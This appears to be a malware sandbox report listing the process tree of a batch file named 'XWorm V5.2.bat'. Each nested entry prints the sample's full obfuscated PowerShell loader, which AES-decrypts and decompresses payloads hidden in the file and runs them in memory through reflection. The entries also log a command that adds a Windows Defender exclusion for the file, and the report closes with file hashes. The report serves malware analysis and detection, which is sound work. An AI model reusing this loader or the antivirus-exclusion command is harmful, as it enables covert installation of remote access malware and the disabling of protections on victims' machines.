C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:1716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵PID:1632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12.3MB
MD51a270a2d79f958a83af1ab2b5805e43c
SHA1aeb2f51a0d1377a25fdcd614fc96fe6b3afbbeeb
SHA2565a0ee0516cf26c772261c81a9cbc45fa625268576debb7d8b38609687554544c
SHA51200bec3f89f9f27236adf0167d6382b60a2be56bdb6b00aae0117396e30e77a993b97d2b7f2af3ae96b81bce0b55bf177d4c4d0c272df05d72c2dc55577b14191
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EZ3IQV36WKD3F1BFXVG1.temp
Filesize7KB
MD593e39f76d77b580fa62d450532298270
SHA1354372f4ed848fe8c790e8e6e700a595e002c828
SHA256b833caf25d47174e317e35221ed2403bff6ac13af2d054ef654dd7ef745b32ae
SHA512230a04565c3430e12963022e42b04ab725f8882ecf2c9edb6af61b50a985853eb2cc7e97434125003ccc46fa70330d263b7db3ce95e12d61d090fe9a2e2f3a6c
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e